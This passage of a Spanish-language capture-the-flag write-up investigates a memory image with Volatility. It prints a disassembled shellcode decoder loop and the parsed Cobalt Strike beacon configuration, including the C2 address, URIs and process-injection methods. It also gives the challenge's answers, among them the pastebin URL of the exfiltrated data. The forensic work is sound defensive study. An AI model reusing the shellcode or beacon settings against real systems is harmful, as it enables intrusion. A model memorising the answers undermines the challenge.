0x000000000316000c 83c504 ADD EBP, 0x4
0x000000000316000f 8b4d00 MOV ECX, [EBP+0x0]
0x0000000003160012 31c1 XOR ECX, EAX
0x0000000003160014 48 DEC EAX
0x0000000003160015 83c504 ADD EBP, 0x4
0x0000000003160018 55 PUSH EBP
0x0000000003160019 8b5500 MOV EDX, [EBP+0x0]
0x000000000316001c 31c2 XOR EDX, EAX
0x000000000316001e 895500 MOV [EBP+0x0], EDX
0x0000000003160021 31d0 XOR EAX, EDX
0x0000000003160023 48 DEC EAX
0x0000000003160024 83c504 ADD EBP, 0x4
0x0000000003160027 83e904 SUB ECX, 0x4
0x000000000316002a 31d2 XOR EDX, EDX
0x000000000316002c 39d1 CMP ECX, EDX
0x000000000316002e 7402 JZ 0x3160032
0x0000000003160030 ebe7 JMP 0x3160019
0x0000000003160032 58 POP EAX
0x0000000003160033 fc CLD
0x0000000003160034 48 DEC EAX
0x0000000003160035 83e4f0 AND ESP, -0x10
0x0000000003160038 ffd0 CALL EAX
0x000000000316003a e8c8ffffff CALL 0x3160007
0x000000000316003f 3d DB 0x3d
Como podemos ver hemos detectado diversos procesos, para poder identificar el proceso me ayude de la siguiente guía: Cobalt Strike, a Defender’s Guide
vol.py -f memory.mem --profile=Win2016x64_14393 memdump -p 1488 -D dump/
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
Writing svchost.exe [ 1488] to 1488.dmp
Nos descargamos CobaltStrikeParser e instalamos las dependencias
git clone https://github.com/Sentinel-One/CobaltStrikeParser
pip3 install -r CobaltStrikeParser/requirements.txt
Parseamos el dump realizado anteriormente
python3 CobaltStrikeParser/parse_beacon_config.py dump/1488.dmp
BeaconType - HTTP
Port - 1337
SleepTime - 60000
MaxGetSize - 1048576
Jitter - 0
MaxDNS - 255
PublicKey_MD5 - fc627cf00878e4d4f7997cb26a80e6fc
C2Server - 192.168.144.129,/updates.rss
UserAgent - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) LBBROWSER
HttpPostUri - /submit.php
Malleable_C2_Instructions - Empty
HttpGet_Metadata - Metadata
base64
header "Cookie"
HttpPost_Metadata - ConstHeaders
Content-Type: application/octet-stream
SessionId
parameter "id"
Output
print
PipeName -
DNS_Idle - 0.0.0.0
DNS_Sleep - 0
SSH_Host - Not Found
SSH_Port - Not Found
SSH_Username - Not Found
SSH_Password_Plaintext - Not Found
SSH_Password_Pubkey - Not Found
SSH_Banner -
HttpGet_Verb - GET
HttpPost_Verb - POST
HttpPostChunk - 0
Spawnto_x86 - %windir%\syswow64\rundll32.exe
Spawnto_x64 - %windir%\sysnative\rundll32.exe
CryptoScheme - 0
Proxy_Config - Not Found
Proxy_User - Not Found
Proxy_Password - Not Found
Proxy_Behavior - Use IE settings
Watermark_Hash - Not Found
Watermark - 305419896
bStageCleanup - False
bCFGCaution - False
KillDate - 0
bProcInject_StartRWX - True
bProcInject_UseRWX - True
bProcInject_MinAllocSize - 0
ProcInject_PrependAppend_x86 - Empty
ProcInject_PrependAppend_x64 - Empty
ProcInject_Execute - CreateThread
SetThreadContext
CreateRemoteThread
RtlCreateUserThread
ProcInject_AllocationMethod - VirtualAllocEx
bUsesCookies - True
HostHeader -
headersToRemove - Not Found
DNS_Beaconing - Not Found
DNS_get_TypeA - Not Found
DNS_get_TypeAAAA - Not Found
DNS_get_TypeTXT - Not Found
DNS_put_metadata - Not Found
DNS_put_output - Not Found
DNS_resolver - Not Found
DNS_strategy - Not Found
DNS_strategy_rotate_seconds - Not Found
DNS_strategy_fail_x - Not Found
DNS_strategy_fail_seconds - Not Found
Retry_Max_Attempts - Not Found
Retry_Increase_Attempts - Not Found
Retry_Duration - Not Found
Más información
- Cazando malware con Volatility
- Hunting Cobalt Strike in Memory
- Malware Analysis: Memory Forensics with Volatility 3
#21 Respuesta: https://pastebin.com/A0Ljk8tu
What is the URL of the exfiltrated data?
Obtención de la evidencia
Intente buscar la filtración en los dump de powershell realizados anteriormente sin ningún resultado. Buscando nuevamente entre los procesos encontré en el proceso de notepad.exe que hacía referencia a un archivo de texto llamado: exfiltrator.txt
❯ vol.py -f memory.mem --profile=Win2016x64_14393 cmdline
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
System pid: 4
************************************************************************
smss.exe pid: 292
Command line : \SystemRoot\System32\smss.exe
************************************************************************
csrss.exe pid: 412
Command line : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
************************************************************************
smss.exe pid: 504
************************************************************************
csrss.exe pid: 512
Command line : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
************************************************************************
winlogon.exe pid: 560
Command line : winlogon.exe
************************************************************************
wininit.exe pid: 568
Command line : wininit.exe
************************************************************************
services.exe pid: 652
Command line : C:\Windows\system32\services.exe
************************************************************************
lsass.exe pid: 664
Command line : C:\Windows\system32\lsass.exe
************************************************************************
svchost.exe pid: 764
Command line : C:\Windows\system32\svchost.exe -k DcomLaunch
************************************************************************
svchost.exe pid: 824
Command line : C:\Windows\system32\svchost.exe -k RPCSS
************************************************************************
dwm.exe pid: 912
Command line : "dwm.exe"
************************************************************************
svchost.exe pid: 972
Command line : C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
************************************************************************
svchost.exe pid: 996
Command line : C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
************************************************************************
svchost.exe pid: 508
Command line : C:\Windows\system32\svchost.exe -k netsvcs
************************************************************************
svchost.exe pid: 400
Command line : C:\Windows\system32\svchost.exe -k LocalService
************************************************************************
svchost.exe pid: 944
Command line : C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
************************************************************************
svchost.exe pid: 1092
Command line : C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
************************************************************************
svchost.exe pid: 1100
Command line : C:\Windows\system32\svchost.exe -k NetworkService
************************************************************************
spoolsv.exe pid: 1592
Command line : C:\Windows\System32\spoolsv.exe
************************************************************************
svchost.exe pid: 1668
Command line : C:\Windows\System32\svchost.exe -k utcsvc
************************************************************************
svchost.exe pid: 1732
Command line : C:\Windows\System32\svchost.exe -k smbsvcs
************************************************************************
svchost.exe pid: 1764
Command line : C:\Windows\system32\svchost.exe -k appmodel
************************************************************************
wlms.exe pid: 1852
Command line : C:\Windows\system32\wlms\wlms.exe
************************************************************************
MsMpEng.exe pid: 1876
Command line : "C:\Program Files\Windows Defender\MsMpEng.exe"
************************************************************************
vm3dservice.ex pid: 1896
Command line : C:\Windows\system32\vm3dservice.exe
************************************************************************
vmtoolsd.exe pid: 1904
Command line : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
************************************************************************
VGAuthService. pid: 1912
Command line : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
************************************************************************
vm3dservice.ex pid: 892
Command line : vm3dservice.exe -n
************************************************************************
svchost.exe pid: 2136
Command line : C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
************************************************************************
dllhost.exe pid: 2812
Command line : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
************************************************************************
msdtc.exe pid: 2912
Command line : C:\Windows\System32\msdtc.exe
************************************************************************
WmiPrvSE.exe pid: 3004
Command line : C:\Windows\system32\wbem\wmiprvse.exe
************************************************************************
WmiPrvSE.exe pid: 2560
Command line : C:\Windows\system32\wbem\wmiprvse.exe
************************************************************************
svchost.exe pid: 3176
Command line : C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
************************************************************************
RuntimeBroker. pid: 4064
Command line : C:\Windows\System32\RuntimeBroker.exe -Embedding
************************************************************************
sihost.exe pid: 2196
Command line : sihost.exe
************************************************************************
svchost.exe pid: 2756
Command line : C:\Windows\system32\svchost.exe -k UnistackSvcGroup
************************************************************************
taskhostw.exe pid: 2424
Command line : taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
************************************************************************
userinit.exe pid: 1140
************************************************************************
explorer.exe pid: 2676
Command line : C:\Windows\Explorer.EXE
************************************************************************
ShellExperienc pid: 3496
Command line : "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
************************************************************************
SearchUI.exe pid: 3408
Command line : "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
************************************************************************
ServerManager. pid: 2552
Command line : "C:\Windows\system32\ServerManager.exe"
************************************************************************
vmtoolsd.exe pid: 3732
Command line : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
************************************************************************
jusched.exe pid: 4172
Command line : "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
************************************************************************
cmd.exe pid: 4356
Command line : "C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startNodeManager.cmd"
************************************************************************
conhost.exe pid: 4364
Command line : \??\C:\Windows\system32\conhost.exe 0x4
************************************************************************
java.exe pid: 4456
Command line :
************************************************************************
cmd.exe pid: 4556
Command line : "C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startWebLogic.cmd"
************************************************************************
conhost.exe pid: 4564
Command line : \??\C:\Windows\system32\conhost.exe 0x4
************************************************************************
cmd.exe pid: 4736
Command line : cmd /c "C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby\bin\startNetworkServer.bat "
************************************************************************
java.exe pid: 4752
Command line :
************************************************************************
java.exe pid: 4772
Command line :
************************************************************************
jucheck.exe pid: 1392
Command line : "C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe" -auto
************************************************************************
fontdrvhost.ex pid: 2824
Command line : "fontdrvhost.exe"
************************************************************************
armsvc.exe pid: 840
Command line : "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
************************************************************************
powershell.exe pid: 4344
Command line :
************************************************************************
conhost.exe pid: 4636
Command line : \??\C:\Windows\system32\conhost.exe 0x4
************************************************************************
powershell.exe pid: 4200
************************************************************************
powershell.exe pid: 2712
************************************************************************
powershell.exe pid: 2132
************************************************************************
powershell.exe pid: 4264
************************************************************************
powershell.exe pid: 3684
************************************************************************
powershell.exe pid: 3676
************************************************************************
powershell.exe pid: 3520
************************************************************************
powershell.exe pid: 1012
************************************************************************
powershell.exe pid: 2200
************************************************************************
powershell.exe pid: 776
************************************************************************
powershell.exe pid: 1616
************************************************************************
mmc.exe pid: 2688
Command line : "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
************************************************************************
svchost.exe pid: 1488
Command line : "C:\Users\Administrator\Desktop\svchost.exe"
************************************************************************
notepad.exe pid: 4596
Command line : "C:\Windows\System32\notepad.exe" exfiltrator.txt
************************************************************************
RamCapture64.e pid: 2568
Command line : "C:\Users\Administrator\Desktop\RamCapturer\x64\RamCapture64.exe"
************************************************************************
conhost.exe pid: 3524
Command line : \??\C:\Windows\system32\conhost.exe 0x4
Realizó un dump del proceso
vol.py -f memory.mem --profile=Win2016x64_14393 memdump -p 4596 -D dump/
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
Writing notepad.exe [ 4596] to 4596.
Dado que piden una URL buscamos por el fichero que hemos detectado anteriormente y por http
strings -e l dump/4596.dmp | grep -A5 exfiltrator.txt | grep http
https://pastebin.com/A0Ljk8tu
:wq!